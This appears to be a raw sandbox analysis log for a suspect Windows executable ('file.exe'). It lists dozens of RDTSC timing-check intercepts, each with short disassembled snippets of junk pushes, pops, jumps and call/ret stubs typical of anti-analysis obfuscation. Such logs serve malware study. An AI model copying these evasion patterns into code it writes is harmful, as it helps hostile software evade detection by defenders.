                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74AFE second address: A74B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F374C500089h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74B21 second address: A74B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74CC0 second address: A74CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74DFB second address: A74E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F374CE66332h 0x0000000b jbe 00007F374CE66326h 0x00000011 jp 00007F374CE66326h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A754B4 second address: A754DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C500088h 0x00000009 jmp 00007F374C50007Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75882 second address: A75886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A442 second address: A6A446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4BECA second address: A4BEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374CE6632Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75B08 second address: A75B12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75B12 second address: A75B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374CE6632Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75B21 second address: A75B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75B27 second address: A75B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F374CE66337h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76225 second address: A7622B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7622B second address: A7622F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7636D second address: A76371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76371 second address: A76377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A767BA second address: A767C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A767C0 second address: A767E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F374CE66339h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A767E4 second address: A767E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40414 second address: A4041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DE05 second address: A7DE1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E268 second address: A7E271 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D3C5 second address: A7D3C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D3C9 second address: A7D408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c ja 00007F374CE66326h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F374CE66337h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E599 second address: A7E59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82DDE second address: A82DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F374CE6632Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A822DF second address: A822E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A822E3 second address: A822F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F374CE6632Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A822F6 second address: A82317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C500087h 0x00000009 jns 00007F374C500076h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82317 second address: A82338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F374CE6632Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82338 second address: A8233E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A824DD second address: A824F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE6632Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8293B second address: A82952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374C500083h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82952 second address: A82975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE6632Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a je 00007F374CE66326h 0x00000010 jng 00007F374CE66326h 0x00000016 pop edi 0x00000017 pop esi 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82975 second address: A82985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F374C500076h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82985 second address: A8298D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8298D second address: A829BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374C50007Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F374C500084h 0x00000011 jmp 00007F374C50007Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A829BE second address: A829C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83578 second address: A83587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C50007Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84284 second address: A8428A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A846AD second address: A846B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A846B9 second address: A846BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84769 second address: A847A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F374C50007Fh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F374C500078h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A847A6 second address: A847B0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F374CE66326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84C7A second address: A84C80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87144 second address: A8718A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F374CE66326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D35B0h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F374CE66328h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov di, EA01h 0x00000036 push eax 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8860D second address: A88612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A886CF second address: A886D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A886D3 second address: A886D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A891CE second address: A891D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A891D2 second address: A891E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jl 00007F374C500098h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A891E4 second address: A891E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8BBB5 second address: A8BBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8BBBA second address: A8BBD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F374CE66333h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7B2 second address: A8F7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7B6 second address: A8F7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374CE6632Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A920B2 second address: A920C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C500080h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A920C6 second address: A920CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94FD9 second address: A95050 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F374C500078h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D1AD2h], eax 0x00000029 add ebx, 5EDE6433h 0x0000002f and edi, 1CC7B3BDh 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D35E8h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007F374C500078h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 mov ebx, dword ptr [ebp+122D37C8h] 0x0000005f xchg eax, esi 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 ja 00007F374C500076h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96148 second address: A96156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F374CE66326h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A952DA second address: A952DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97032 second address: A97036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98054 second address: A98068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374C50007Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9723B second address: A97252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374CE66333h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97252 second address: A97256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99014 second address: A99018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99018 second address: A9901E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9901E second address: A99028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F374CE66326h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B124 second address: A9B132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C50007Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B132 second address: A9B144 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F374CE66326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B144 second address: A9B148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B261 second address: A9B265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C23E second address: A9C244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B265 second address: A9B2F6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F374CE66328h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F374CE66328h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+12472C56h], ebx 0x0000002b push dword ptr fs:[00000000h] 0x00000032 xor dword ptr [ebp+122D194Dh], esi 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov edi, dword ptr [ebp+12466F18h] 0x00000045 mov eax, dword ptr [ebp+122D14C5h] 0x0000004b mov dword ptr [ebp+122D2839h], edi 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebx 0x00000056 call 00007F374CE66328h 0x0000005b pop ebx 0x0000005c mov dword ptr [esp+04h], ebx 0x00000060 add dword ptr [esp+04h], 00000018h 0x00000068 inc ebx 0x00000069 push ebx 0x0000006a ret 0x0000006b pop ebx 0x0000006c ret 0x0000006d mov ebx, dword ptr [ebp+1244CBEEh] 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 jg 00007F374CE6632Ch 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C244 second address: A9C267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D2D6 second address: A9D2E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F374CE66326h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B2F6 second address: A9B300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F374C500076h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E393 second address: A9E3BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F374CE6632Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D2E0 second address: A9D368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1AF0h], esi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F374C500078h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov bl, BBh 0x0000003c mov edi, dword ptr [ebp+122D1830h] 0x00000042 mov eax, dword ptr [ebp+122D156Dh] 0x00000048 push FFFFFFFFh 0x0000004a mov di, si 0x0000004d pushad 0x0000004e mov esi, ebx 0x00000050 jmp 00007F374C500082h 0x00000055 popad 0x00000056 push eax 0x00000057 pushad 0x00000058 push esi 0x00000059 push esi 0x0000005a pop esi 0x0000005b pop esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF631B second address: AF632D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F374CE66326h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF632D second address: AF6359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F374C500090h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F374C500088h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6359 second address: AF635F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7281 second address: AF72A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F374C500076h 0x00000010 jmp 00007F374C500086h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF72A7 second address: AF72AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF72AB second address: AF72B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7AA0 second address: AF7AB2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F374CE66328h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F374CE66326h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7AB2 second address: AF7AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5A1A second address: AF5A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5A1E second address: AF5A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F374C50007Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00842 second address: B00857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F374CE6632Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0057D second address: B00581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10008 second address: B10016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 je 00007F374CE66326h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B123D0 second address: B123E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C50007Fh 0x00000007 jng 00007F374C500076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
